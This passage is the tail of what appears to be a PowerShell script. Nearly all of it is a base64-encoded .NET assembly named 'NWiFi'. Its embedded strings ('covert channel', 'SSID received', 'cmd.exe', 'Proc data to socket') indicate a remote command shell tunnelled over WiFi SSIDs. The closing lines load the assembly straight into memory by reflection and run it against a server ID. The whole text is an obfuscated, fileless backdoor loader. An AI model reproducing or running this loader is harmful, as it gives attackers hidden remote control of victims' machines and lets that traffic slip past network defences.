AYwBhAHUAcwBlACAAcwBvAGMAawBlAHQAIABuAG8AdAAgAGkAbgAgAE8AUABFAE4AIABzAHQAYQB0AGUAAICjUwBUAEEAUgBUACAARgBvAHIAYwBlAGQAIABzAGwAZQBlAHAALAAgAGIAZQBjAGEAdQBzAGUAIABsAGEAcwB0ACAAcgBlAHMAcABvAG4AcwBlACAAaABhAGQAIABkAGEAdABhACAAaQBuAGMAbAB1AGQAZQBkAC4ALgAuACAAbwB1AHQAcQB1AGUAdQBlACAAYwBvAHUAbgB0ACAAewAwAH0AAIChUwBUAE8AUAAgAEYAbwByAGMAZQBkACAAcwBsAGUAZQBwACwAIABiAGUAYwBhAHUAcwBlACAAbABhAHMAdAAgAHIAZQBzAHAAbwBuAHMAZQAgAGgAYQBkACAAZABhAHQAYQAgAGkAbgBjAGwAdQBkAGUAZAAuAC4ALgAgAG8AdQB0AHEAdQBlAHUAZQAgAGMAbwB1AG4AdAAgAHsAMAB9AACArVMAdABvAHAAcABpAG4AZwAgAHMAZQBuAGQALwByAGUAYwBlAGkAdgBlACAAdABoAHIAZQBhAGQAIABmAG8AcgAgAEMAbABpAGUAbgB0AFMAbwBjAGsAZQB0ACwAIABiAGUAYwBhAHUAcwBlACAAcwBvAGMAawBlAHQAIABpAHMAbgAnAHQAIABuAG8AdAAgAGkAbgAgAE8AUABFAE4AIABzAHQAYQB0AGUALgABJVMAUwBJAEQAIAByAGUAYwBpAGUAdgBlAGQAOgAgAHsAMAB9AAAnRABpAHMAYwBhAHIAZABlAGQAIABTAFMASQBEADoAIAB7ADAAfQAAW0EAYwBjAGUAcwBzACAAdgBpAG8AbABhAHQAaQBvAG4AIABpAG4AIABlAHgAdAByAGEAYwB0AEkAZQAgAGYAbwByACAASQBFACAAdAB5AHAAZQAgAHsAMAB9AAAZUwBjAGEAbgAgAGYAYQBpAGwAZQBkACEAAB9TAGMAYQBuACAAYwBvAG0AcABsAGUAdABlAGQAIQAAJU4AZQB0AHcAbwByAGsAIABBAHYAYQBpAGwAYQBiAGwAZQAhAAAtTgBlAHQAdwBvAHIAawAgAE4ATwBUACAAQQB2AGEAaQBsAGEAYgBsAGUAIQAAJ1AAcgBvAGYAaQBsAGUAcwAgAGUAeABoAGEAdQBzAHQAZQBkACEAAFlOAG8AIAB2AGEAbABpAGQAIABoAGEAbgBkAGwAZQAgAGYAbwByACAAbgBhAHQAaQB2AGUAIABXAGkARgBpACAAQQBQAEkAIAByAGUAYwBlAGkAdgBlAGQAAEdFAHIAcgBvAHIAIAByAGUAZwBpAHMAdABlAHIAaQBuAGcAIABmAG8AcgAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAAFVUAHIAeQBpAG4AZwAgAHQAbwAgAGMAbwBuAG4AZQBjAHQAIABjAG8AdgBlAHIAdAAgAGMAaABhAG4AbgBlAGwAIAB2AGkAYQAgACcAewAwAH0AJwABW0MAbwBuAG4AZQBjAHQAaQBvAG4AIABlAHMAdABhAGIAbABpAHMAaABlAGQACgBNAFQAVQA6ACAAewAwAH0ACgBDAGwAaQBlAG4AdABJAEQAOgAgAHsAMQB9AAAPYwBtAGQALgBlAHgAZQAAS1MAdQBiAHAAcgBvAGMAZQBzAHMAIABkAGkAZQBkACAAdwBpAHQAaAAgAHIAZQBhAHMAbwBuACAAYwBvAGQAZQA6ACAAewAwAH0AAFFOAG8AIABzAHUAYwBjAGUAcwBzACAAYQBmAHQAZQByACAAewAwAH0AIABjAG8AbgBuAGUAYwB0AGkAbwBuACAAYQB0AHQAZQBtAHAAdABzAABDQwBsAG8AcwBpAG4AZwAgAGgAYQBuAGQAbABlACAAdABvACAAbgBhAHQAaQB2AGUAIABXAGkARgBpACAAQQBQAEkAABtTAHQAYQByAHQAaQBuAGcAIAB0AGUAcwB0AABBUAByAG8AYwBlAHMAcwAgAGQAaQBlAGQAIAB3AGkAdABoACAAZQB4AGkAdAAgAGMAbwBkAGUAOgAgAHsAMAB9AAATcgBhAHQAZQBJAG4AZABlAHgAAAMKAAAxUAByAG8AYwAgAGQAYQB0AGEAIAB0AG8AIABzAG8AYwBrAGUAdAA6ACAAewAwAH0AADlTAG8AYwBrAGUAdABkAGEAdABhACAAZABhAHQAYQAgAHQAbwAgAHAAcgBvAGMAOgAgAHsAMAB9AABxUwBvAGMAawBlAHQAIABiAGEAYwBrAGkAbgBnACAAdABoAGUAIABwAHIAbwBjAGUAcwBzACAAZABpAHMAYwBvAG4AbgBlAGMAdAB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" +[System.Reflection.Assembly]::Load([Convert]::FromBase64String($s)) +[NWiFi.NativeWifi]::run(-1, $srvID) \ No newline at end of file